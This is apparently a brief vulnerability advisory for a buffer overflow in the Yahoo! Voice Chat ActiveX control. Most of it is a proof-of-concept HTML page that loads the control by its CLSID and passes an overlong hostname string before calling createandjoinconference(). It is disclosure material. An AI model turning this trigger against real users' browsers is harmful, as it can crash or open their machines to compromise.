|
|
Yahoo! Voice Chat ActiveX Control Buffer Overflow Vulnerability
The following proof-of-concept was submitted: ------sample.htm----------- <OBJECT id=yahooaudio type="application/x-oleobject" classid="clsid:2B323CD9-50E3-11D3-9466-00A0C9700498"> </OBJECT> <script> yahooaudio.hostname="longstringheremorethan500chars"; yahooaudio.createandjoinconference(); </script> --------------------------- |
|
Privacy Statement |